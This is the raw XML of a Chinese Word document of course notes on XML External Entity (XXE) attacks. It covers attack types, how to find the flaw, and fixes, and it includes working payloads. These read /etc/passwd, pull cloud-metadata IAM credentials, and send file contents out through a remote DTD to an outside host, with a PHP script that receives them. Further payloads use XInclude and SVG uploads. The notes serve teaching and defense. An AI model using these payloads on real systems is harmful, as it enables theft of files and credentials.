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82DC" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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Web攻防-XML&amp;XXE&amp;无回显带外&amp;SSRF元数据&amp;DTD实体&amp;OOB盲注&amp;文件拓展&amp;复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D63FB1" w14:textId="6B8FE04A" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1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4EFA514" wp14:editId="35B7E9C4">
            <wp:extent cx="5270500" cy="16465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0FE4" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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1EAC6636" w14:textId="1E40F3D9" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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89CC2FC" wp14:editId="68765252">
            <wp:extent cx="5270500" cy="58502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F664" w14:textId="520CBCEE" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1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0F12BC4" wp14:editId="308AA5F0">
            <wp:extent cx="5274310" cy="6870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2CD4" w14:textId="257341BB" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1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F28DF76" wp14:editId="4CB06082">
            <wp:extent cx="5274310" cy="227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353"/>
        <w:gridCol w:w="2644"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A1B1F" w14:paraId="7E6A38EF" w14:textId="77777777" w:rsidTr="003A1B1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2B547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A73F8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类型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2B547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5FB85A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特征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2B547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03B93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典型场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A1B1F" w14:paraId="73098972" w14:textId="77777777" w:rsidTr="003A1B1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7346A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带内数据XXE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2AFA2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直接返回攻击结果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58AD9F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文件读取、SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A1B1F" w14:paraId="6C632098" w14:textId="77777777" w:rsidTr="003A1B1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EACEB4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基于错误XXE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08A5A1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通过报错信息泄露数据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71451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配置错误的环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A1B1F" w14:paraId="49BCFA43" w14:textId="77777777" w:rsidTr="003A1B1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E657C3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带外数据XXE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1A715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通过DNS/HTTP外带数据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33C943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严格过滤场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A1B1F" w14:paraId="4962DF41" w14:textId="77777777" w:rsidTr="003A1B1F">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2371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9BDE5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Blind XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3353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56E710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无直接回显攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2644" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="4C4C4C"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="4C4C4C"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4C4C4C"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="4C4C4C"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="19191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B27CE" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F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FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>日志文件注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="711B9D26" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1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B68A128" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1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WEB攻防-XML&amp;XXE-注入原理&amp;分类&amp;安全影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB5A2B" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1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WEB攻防-XML&amp;XXE-文件读取&amp;SSRF&amp;外部实体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BEE6E8" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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WEB攻防-XML&amp;XXE-无回显利用&amp;文件拓展解析等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD3077" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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详细点：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被设计为传输和存储数据，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文档结构包括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声明、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文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从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分离，是独立于软件和硬件的信息传输工具。等同于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的主要差异：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XML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被设计为传输和存储数据，其焦点是数据的内容。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被设计用来显示数据，其焦点是数据的外观。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旨在显示信息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旨在传输存储信息。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 External Entity Injection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外部实体注入漏洞：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发生在应用程序解析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输入时，没禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网扫描、攻击内网等危害。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黑盒发现：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两类：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数据包的测试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功能点的测试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、获取得到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或数据类型为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时，尝试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、不管获取的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Content-Type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类型或数据传输类型，均可尝试修改后提交测试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不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成文件中的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 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白盒发现：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、可通过应用功能追踪代码定位审计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、可通过脚本特定函数搜索定位审计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、可通过伪协议玩法绕过相关修复等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修复防御方案：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禁用外部实体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libxml_disable_entity_loader(true);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DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);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from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))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过滤用户提交的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过滤关键词：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，或者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PUBLIC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、文件读取：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 encoding="UTF-8"?&gt;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test [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; 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&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;/productId&gt;&lt;storeId&gt;1&lt;/storeId&gt;&lt;/stockCheck&gt;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配合元数据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条件：存在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注入的云服务器应用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 encoding="UTF-8"?&gt;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foo [ &lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"&gt; 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&lt;stockCheck&gt;&lt;productId&gt;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&amp;xxe;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&lt;/productId&gt;&lt;storeId&gt;1&lt;/storeId&gt;&lt;/stockCheck&gt;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外部引用实体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 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test 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&lt;!ENTITY % file SYSTEM "http://xiaodi8.com/file.dtd"&gt;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%file;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&lt;user&gt;&lt;username&gt;&amp;send;&lt;/username&gt;&lt;password&gt;xiaodi&lt;/password&gt;&lt;/user&gt;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file.dtd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send SYSTEM "file:///d:/x.txt"&gt;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无回显利用：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、带外测试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 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test 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&lt;!ENTITY % file SYSTEM "http://xiaodi8.dnslog.cn"&gt;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%file;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&lt;user&gt;&lt;username&gt;&amp;send;&lt;/username&gt;&lt;password&gt;xiaodi&lt;/password&gt;&lt;/user&gt;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、外部引用实体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ANY[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file SYSTEM "file:///c:/c.txt"&gt;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remote SYSTEM "http://www.xiaodi8.com/test.dtd"&gt;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%remote;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%all;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&lt;user&gt;&lt;username&gt;&amp;send;&lt;/username&gt;&lt;password&gt;xiaodi&lt;/password&gt;&lt;/user&gt;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test.dtd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all "&lt;!ENTITY send SYSTEM 'http://www.xiaodi8.com/get.php?file=%file;'&gt;"&gt;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get.php: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$data=$_GET['file'];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$myfile = fopen("file.txt", "w+");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fwrite($myfile, $data);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fclose($myfile);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test.dtd-&gt;all-&gt;send-&gt;get.php?file=%file-&gt;file:///c:/c.txt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http://www.xiaodi8.com/get.php?file=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读取的内网数据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、外部引用实体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dtd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配合错误解析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file SYSTEM "file:///etc/passwd"&gt;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eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'file:///invalid/%file;'&gt;"&gt;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%eval;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%exfil;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foo [&lt;!ENTITY % xxe SYSTEM "https://exploit-0ab2006f03dce8a4803dfde101f3007d.exploit-server.net/exploit"&gt; %xxe;]&gt;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升级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一些应用程序接收客户端提交的数据，在服务器端将其嵌入到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文档中，然后解析该文档，所以利用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嵌套进去执行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&lt;foo xmlns:xi="http://www.w3.org/2001/XInclude"&gt;&lt;xi:include parse="text" href="file:///etc/passwd"/&gt;&lt;/foo&gt;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图像解析（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一些应用程序接收解析文件，可以使用基于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的格式的例子有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这样的办公文档格式和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这样的图像格式进行测试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 standalone="yes"?&gt;&lt;!DOCTYPE test [ &lt;!ENTITY xxe SYSTEM "file:///etc/hostname" &gt; ]&gt;&lt;svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"&gt;&lt;text font-size="16" x="0" y="16"&gt;&amp;xxe;&lt;/text&gt;&lt;/svg&gt;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、见图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SOAP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RPC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这些接收和处理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导出功能：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任何以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格式传输数据的进出口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RSS/Atom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订阅处理器：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订阅功能也可能隐藏着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XXE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文档查看器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XLSX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XML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格式文档的功能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SVG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图像处理器，上传图片也可能中招！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http://web.jarvisoj.com:9882/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https://mp.weixin.qq.com/s/5iPoqsWpYfQmr0ExcJYRwg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D292B6E" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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涉及资源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a7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F7411E0" w14:textId="77777777" w:rsidR="003A1B1F" w:rsidRDefault="003A1B1F" w:rsidP="003A1B1F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4522F303" w14:textId="77777777" w:rsidR="00481DCB" w:rsidRDefault="00481DCB"/>
    <w:sectPr w:rsidR="0048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19DC" w14:textId="77777777" w:rsidR="0019615B" w:rsidRDefault="0019615B" w:rsidP="003A1B1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="347A3929" w14:textId="77777777" w:rsidR="0019615B" w:rsidRDefault="0019615B" w:rsidP="003A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0664" w14:textId="77777777" w:rsidR="0019615B" w:rsidRDefault="0019615B" w:rsidP="003A1B1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7AB5D662" w14:textId="77777777" w:rsidR="0019615B" w:rsidRDefault="0019615B" w:rsidP="003A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1E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA6071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41"/>
    <w:rsid w:val="0019615B"/>
    <w:rsid w:val="003A1B1F"/>
    <w:rsid w:val="00481DCB"/>
    <w:rsid w:val="00D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CD6E3-0B36-463D-82F8-F49678C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B1F"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia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B1F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a"/>
    <w:semiHidden/>
    <w:rsid w:val="003A1B1F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1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1B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1B1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A1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2025-05-23T05:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-23T05:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>